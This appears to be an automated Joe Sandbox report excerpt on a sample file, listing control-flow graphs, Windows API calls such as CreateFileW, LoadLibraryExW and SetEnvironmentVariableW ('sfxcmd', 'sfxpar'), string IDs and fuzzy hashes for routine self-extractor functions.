                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: f32462e0a34dbe209f66d839a3a760d05f785be34110acbdf1da892ba37f7adf
                                                            • Instruction ID: 6f2196be2de087e8d31b4f888cb0e222f6cdc39e55cdcaeaa6a40bc2502dba4e
                                                            • Opcode Fuzzy Hash: f32462e0a34dbe209f66d839a3a760d05f785be34110acbdf1da892ba37f7adf
                                                            • Instruction Fuzzy Hash: AB51A072602256ABFB268E64CC45EFABBAAFF84710F154629FC05D6140EB34DCD0D691

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 978 513b72-513b7c 979 513bee-513bf1 978->979 980 513bf3 979->980 981 513b7e-513b8c 979->981 984 513bf5-513bf9 980->984 982 513b95-513bb1 LoadLibraryExW 981->982 983 513b8e-513b91 981->983 987 513bb3-513bbc GetLastError 982->987 988 513bfa-513c00 982->988 985 513b93 983->985 986 513c09-513c0b 983->986 989 513beb 985->989 986->984 990 513be6-513be9 987->990 991 513bbe-513bd3 call 516088 987->991 988->986 992 513c02-513c03 FreeLibrary 988->992 989->979 990->989 991->990 995 513bd5-513be4 LoadLibraryExW 991->995 992->986 995->988 995->990
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00513C35,?,?,00552088,00000000,?,00513D60,00000004,InitializeCriticalSectionEx,00526394,InitializeCriticalSectionEx,00000000), ref: 00513C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: ec8d8de1357aa83b201d4e6fe7b75d9747a4c77bdcd7d946a4dcb27b066edba9
                                                            • Instruction ID: 77ddde64d4edfc692cd2dab4d62679a59317b140890d2491ebe8d553bb29098c
                                                            • Opcode Fuzzy Hash: ec8d8de1357aa83b201d4e6fe7b75d9747a4c77bdcd7d946a4dcb27b066edba9
                                                            • Instruction Fuzzy Hash: 9811E735A09221ABEB318B589C55BD93F64BF12770F110160E815EB1D0F734EF8496D0

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0050081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00500836
                                                              • Part of subcall function 0050081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004FF2D8,Crypt32.dll,00000000,004FF35C,?,?,004FF33E,?,?,?), ref: 00500858
                                                            • OleInitialize.OLE32(00000000), ref: 0050AC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0050AC66
                                                            • SHGetMalloc.SHELL32(00538438), ref: 0050AC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3Ro
                                                            • API String ID: 3498096277-3613677438
                                                            • Opcode ID: 3d87c0e81d857da45779c6fa5b8c95167e4c4eaa8cfbff551a5553d905821808
                                                            • Instruction ID: 770c81754fb29718ab630807f74bf879555bca4c44e69dfd25f87e468c73e6ef
                                                            • Opcode Fuzzy Hash: 3d87c0e81d857da45779c6fa5b8c95167e4c4eaa8cfbff551a5553d905821808
                                                            • Instruction Fuzzy Hash: AAF0F9B190020AABCB10AFA9D8499EFFFFCFF94745F00415AA415A2291DBB456058FA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1000 4f98e0-4f9901 call 50ec50 1003 4f990c 1000->1003 1004 4f9903-4f9906 1000->1004 1006 4f990e-4f991f 1003->1006 1004->1003 1005 4f9908-4f990a 1004->1005 1005->1006 1007 4f9927-4f9931 1006->1007 1008 4f9921 1006->1008 1009 4f9936-4f9943 call 4f6edb 1007->1009 1010 4f9933 1007->1010 1008->1007 1013 4f994b-4f996a CreateFileW 1009->1013 1014 4f9945 1009->1014 1010->1009 1015 4f996c-4f998e GetLastError call 4fbb03 1013->1015 1016 4f99bb-4f99bf 1013->1016 1014->1013 1020 4f99c8-4f99cd 1015->1020 1025 4f9990-4f99b3 CreateFileW GetLastError 1015->1025 1017 4f99c3-4f99c6 1016->1017 1019 4f99d9-4f99de 1017->1019 1017->1020 1023 4f99ff-4f9a10 1019->1023 1024 4f99e0-4f99e3 1019->1024 1020->1019 1022 4f99cf 1020->1022 1022->1019 1027 4f9a2e-4f9a39 1023->1027 1028 4f9a12-4f9a2a call 500602 1023->1028 1024->1023 1026 4f99e5-4f99f9 SetFileTime 1024->1026 1025->1017 1029 4f99b5-4f99b9 1025->1029 1026->1023 1028->1027 1029->1017
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,004F7760,?,00000005,?,00000011), ref: 004F995F
                                                            • GetLastError.KERNEL32(?,?,004F7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004F996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,004F7760,?,00000005,?), ref: 004F99A2
                                                            • GetLastError.KERNEL32(?,?,004F7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004F99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,004F7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004F99F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 5441dfc82b33b9a36f9902662eba2af0b59bdbbdf6473ec315adf2203ed6e8ec
                                                            • Instruction ID: 8f7bd85ff98b864e771884a19fa1a85c48e39e37c4e908ac6803e13c149085cf
                                                            • Opcode Fuzzy Hash: 5441dfc82b33b9a36f9902662eba2af0b59bdbbdf6473ec315adf2203ed6e8ec
                                                            • Instruction Fuzzy Hash: 603116705447496FE7309F24CC49FABBB94BB45320F110B1EF6A1963D0D3E86945CB99

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1059 50b568-50b581 PeekMessageW 1060 50b583-50b597 GetMessageW 1059->1060 1061 50b5bc-50b5be 1059->1061 1062 50b5a8-50b5b6 TranslateMessage DispatchMessageW 1060->1062 1063 50b599-50b5a6 IsDialogMessageW 1060->1063 1062->1061 1063->1061 1063->1062
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                                            • IsDialogMessageW.USER32(00010424,?), ref: 0050B59E
                                                            • TranslateMessage.USER32(?), ref: 0050B5AC
                                                            • DispatchMessageW.USER32(?), ref: 0050B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 462ca71fdbade76733d458df7bdf77318ccd3934a21a53bd6e7bdfc4da414aa5
                                                            • Instruction ID: 460f73148a31ef5d3a175802d1d51d0c30a17404ade6b5202561a30917fc65d3
                                                            • Opcode Fuzzy Hash: 462ca71fdbade76733d458df7bdf77318ccd3934a21a53bd6e7bdfc4da414aa5
                                                            • Instruction Fuzzy Hash: 9CF0BD71A0131AABDB209BE5DC5CDDF7FBCEE153917004415B509D20A0EB74D609DBB0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1064 50abab-50abca GetClassNameW 1065 50abf2-50abf4 1064->1065 1066 50abcc-50abe1 call 501fbb 1064->1066 1067 50abf6-50abf9 SHAutoComplete 1065->1067 1068 50abff-50ac01 1065->1068 1071 50abf1 1066->1071 1072 50abe3-50abef FindWindowExW 1066->1072 1067->1068 1071->1065 1072->1071
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 0050ABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 0050ABF9
                                                              • Part of subcall function 00501FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,004FC116,00000000,.exe,?,?,00000800,?,?,?,00508E3C), ref: 00501FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0050ABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: b04bd5e237845daa38cb4a1e3ae63ba0c2c8ab93eb795a441145ae05f4b89a3d
                                                            • Instruction ID: 731202ac02d571cd38ac057efb8d897b137ef200eccee2878db56e1e16242f56
                                                            • Opcode Fuzzy Hash: b04bd5e237845daa38cb4a1e3ae63ba0c2c8ab93eb795a441145ae05f4b89a3d
                                                            • Instruction Fuzzy Hash: B4F0A73270032977DB2057249C0EFDF7AACAF46B51F484011BA05F31D0D760DE4995B6

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1073 50dbde-50dc09 call 50ec50 SetEnvironmentVariableW call 500371 1077 50dc0e-50dc12 1073->1077 1078 50dc14-50dc18 1077->1078 1079 50dc36-50dc38 1077->1079 1080 50dc21-50dc28 call 50048d 1078->1080 1083 50dc1a-50dc20 1080->1083 1084 50dc2a-50dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1079
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0050DBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0050DC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: 268e01b862d7d404a7b62711810c84c5881f7766920b4f876526d0495aecb009
                                                            • Instruction ID: 891ad38259985be153faa01c624f9873ef9ce0de81c642d797fb4645bcd1f43b
                                                            • Opcode Fuzzy Hash: 268e01b862d7d404a7b62711810c84c5881f7766920b4f876526d0495aecb009
                                                            • Instruction Fuzzy Hash: 92F0A77240523566DB311BD4DC0ABFE3F68BF15781B040411BD85960D1E6B48D51D6B0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1085 4f9785-4f9791 1086 4f979e-4f97b5 ReadFile 1085->1086 1087 4f9793-4f979b GetStdHandle 1085->1087 1088 4f97b7-4f97c0 call 4f98bc 1086->1088 1089 4f9811 1086->1089 1087->1086 1093 4f97d9-4f97dd 1088->1093 1094 4f97c2-4f97ca 1088->1094 1091 4f9814-4f9817 1089->1091 1096 4f97df-4f97e8 GetLastError 1093->1096 1097 4f97ee-4f97f2 1093->1097 1094->1093 1095 4f97cc 1094->1095 1101 4f97cd-4f97d7 call 4f9785 1095->1101 1096->1097 1098 4f97ea-4f97ec 1096->1098 1099 4f980c-4f980f 1097->1099 1100 4f97f4-4f97fc 1097->1100 1098->1091 1099->1091 1100->1099 1102 4f97fe-4f9807 GetLastError 1100->1102 1101->1091 1102->1099 1104 4f9809-4f980a 1102->1104 1104->1101
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004F9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004F97AD
                                                            • GetLastError.KERNEL32 ref: 004F97DF
                                                            • GetLastError.KERNEL32 ref: 004F97FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: d3db1b3f438a0addc07b7d1fdfa33f9f069dbe3cbfcf9342c0900bc4df8e4780
                                                            • Instruction ID: d68e8fba5b0b35b81e7c518f74338e0d2a6dbabacd68883947ae922537c599cd
                                                            • Opcode Fuzzy Hash: d3db1b3f438a0addc07b7d1fdfa33f9f069dbe3cbfcf9342c0900bc4df8e4780
                                                            • Instruction Fuzzy Hash: CA11733052430CEBDF317F65C804B7A77A9BF52360F10852BE61685290D77C9E459B69
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00513F73,00000000,00000000,?,0051ACDB,00513F73,00000000,00000000,00000000,?,0051AED8,00000006,FlsSetValue), ref: 0051AD66
                                                            • GetLastError.KERNEL32(?,0051ACDB,00513F73,00000000,00000000,00000000,?,0051AED8,00000006,FlsSetValue,00527970,FlsSetValue,00000000,00000364,?,005198B7), ref: 0051AD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0051ACDB,00513F73,00000000,00000000,00000000,?,0051AED8,00000006,FlsSetValue,00527970,FlsSetValue,00000000), ref: 0051AD80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 42f5faaa48b0f9a96f2c089d9bb672a511348557ba034beeeeb277375882bd9f
                                                            • Instruction ID: 885dc89996a72f5e926f876be62148226556201342b2486ac6a574da7419fde6
                                                            • Opcode Fuzzy Hash: 42f5faaa48b0f9a96f2c089d9bb672a511348557ba034beeeeb277375882bd9f
                                                            • Instruction Fuzzy Hash: 47014C36202622ABD7338A68BC449D77F58FF267637140620F806D3550D720C84586E1
                                                            APIs
                                                              • Part of subcall function 005197E5: GetLastError.KERNEL32(?,00531030,00514674,00531030,?,?,00513F73,00000050,?,00531030,00000200), ref: 005197E9
                                                              • Part of subcall function 005197E5: _free.LIBCMT ref: 0051981C
                                                              • Part of subcall function 005197E5: SetLastError.KERNEL32(00000000,?,00531030,00000200), ref: 0051985D
                                                              • Part of subcall function 005197E5: _abort.LIBCMT ref: 00519863
                                                              • Part of subcall function 0051BB4E: _abort.LIBCMT ref: 0051BB80
                                                              • Part of subcall function 0051BB4E: _free.LIBCMT ref: 0051BBB4
                                                              • Part of subcall function 0051B7BB: GetOEMCP.KERNEL32(00000000,?,?,0051BA44,?), ref: 0051B7E6
                                                            • _free.LIBCMT ref: 0051BA9F
                                                            • _free.LIBCMT ref: 0051BAD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID: pR
                                                            • API String ID: 2991157371-2883592124
                                                            • Opcode ID: 8a9cc6184ab7eea1d0b74f1b60d26e763dfe32f0294678dd1548f68df706d245
                                                            • Instruction ID: aa864410ad8b476ca7c7265721ad49ce183de56a5c981e91639dd75cc7316c44
                                                            • Opcode Fuzzy Hash: 8a9cc6184ab7eea1d0b74f1b60d26e763dfe32f0294678dd1548f68df706d245
                                                            • Instruction Fuzzy Hash: 20318431904209AFFB10DBA8D445BED7FF5FF81320F254099E5049B2A2EB315D81DB50
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 2P$PDu<P
                                                            • API String ID: 1269201914-2500406688
                                                            • Opcode ID: fa5257daf36aa27df89af41b256908473e2d74b6d98b73bdc7d1c3f234609d7d
                                                            • Instruction ID: c5a9fa32a5cac4891e61dc61883a16b83ad914d181d512a1334fec5df6137643
                                                            • Opcode Fuzzy Hash: fa5257daf36aa27df89af41b256908473e2d74b6d98b73bdc7d1c3f234609d7d
                                                            • Instruction Fuzzy Hash: BAB012D22585017DB204510C2C1BD3F0D4DFBC6F113308C2FF808C00C1F8401C050431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: (P$PDu<P
                                                            • API String ID: 1269201914-2960419716
                                                            • Opcode ID: c311928b7b3ff2cd8722882ee63d02f125f4031ba8e725312df4fa17b61e3b8f
                                                            • Instruction ID: 71ccab0ad0b65082af25b5eeb22907cf794ff7ebfcc70f8f4f294d086710b3c9
                                                            • Opcode Fuzzy Hash: c311928b7b3ff2cd8722882ee63d02f125f4031ba8e725312df4fa17b61e3b8f
                                                            • Instruction Fuzzy Hash: EBB092922585416CA24451082D1BC3E4D49EAC6B113308C2FB808C00C1A8401C060431
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,004FD343,00000001,?,?,?,00000000,0050551D,?,?,?), ref: 004F9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0050551D,?,?,?,?,?,00504FC7,?), ref: 004F9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,004FD343,00000001,?,?), ref: 004FA011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: 7e68c5a30d0a54c90b5c03c96ea56ad6d9ae7b4d12813bc5e7884053fd38c203
                                                            • Instruction ID: 5dabb2474d6097961b80cdc8d57ccc8b35173957cd9f0e5c6be9348a6e5f5ebb
                                                            • Opcode Fuzzy Hash: 7e68c5a30d0a54c90b5c03c96ea56ad6d9ae7b4d12813bc5e7884053fd38c203
                                                            • Instruction Fuzzy Hash: 4E319F7120430AAFDB14CF20E808B7B77A5EF85715F04451AFA4597290CB79AD49CBAB
